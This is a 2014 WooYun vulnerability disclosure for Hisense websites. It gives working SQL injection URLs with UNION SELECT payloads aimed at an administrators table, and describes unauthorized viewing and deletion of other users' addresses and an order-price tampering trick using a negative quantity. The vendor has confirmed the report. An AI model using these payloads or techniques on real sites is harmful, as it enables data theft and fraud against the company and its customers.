当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-085287

漏洞标题:海信集团网站漏洞礼包(注入+越权地址查看+订单金额修改)

相关厂商:hisense.com

漏洞作者: JJ Fly

提交时间:2014-12-01 10:26

修复时间:2015-01-15 10:28

公开时间:2015-01-15 10:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-01: 细节已通知厂商并且等待厂商处理中
2014-12-01: 厂商已经确认,细节仅向厂商公开
2014-12-11: 细节向核心白帽子及相关领域专家公开
2014-12-21: 细节向普通白帽子公开
2014-12-31: 细节向实习白帽子公开
2015-01-15: 细节向公众公开

简要描述:

海信集团网站漏洞礼包(注入+越权地址查看+订单金额修改)

详细说明:

1.
注入
http://hbmt.hisense.com/cn/product.aspx?ClassID=z8UwZwanMEg%3d&Length=1.4km
Length=1.4km 存在sql注入漏洞
好多数据库

图片1.png


爆下数据
http://hbmt.hisense.com:80/cn/product.aspx?ClassID=z8UwZwanMEg=&Length=1.4km%' UNION ALL SELECT 1,2,char(101),char(102),char(103),char(104),char(105),char(106),char(107),char(108),char(109),char(110),3,char(112),char(113),char(114),4--

图片2.png


http://hbmt.hisense.com:80/cn/product.aspx?ClassID=z8UwZwanMEg=&Length=1.4km%' UNION ALL SELECT 1,2,char(101),(select top 1 LogId from E_Administrators ),char(103),char(104),char(105),char(106),char(107),char(108),char(109),char(110),3,char(112),char(113),char(114),4--

图片3.png


2.
http://www.hisensephone.com/
越权

图片4.png


可以越权查看他人 身份信息

图片5.png


图片6.png


图片7.png


删除的地方 可以越权 删除他人的地址
还有一处越权 ,可以在 下订单的时候 添加到他人的订单id
下面会说。

图片8.png


3.
http://www.hisensephone.com/
订单金额修改
下订单的时候

图片9.png


抓包
hdCount=62%241%249%24%E7%A7%BB%E5%8A%A83G%2F%E6%B8%A9%E8%8E%8E%E7%99%BD%24%24
解密下
hdCount=62$1$9$移动3G/温莎白$$
然后我们把 1 修改为-1 进行提交。
到时候就成负数了
设置地址的时候会发送一个

图片10.png


把地址的id进行修改就行了

图片11.png

漏洞证明:

同上

修复方案:

版权声明:转载请注明来源 JJ Fly@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-12-01 13:13

厂商回复:

感谢提报的安全报告,我们将尽快修复。

最新状态:

暂无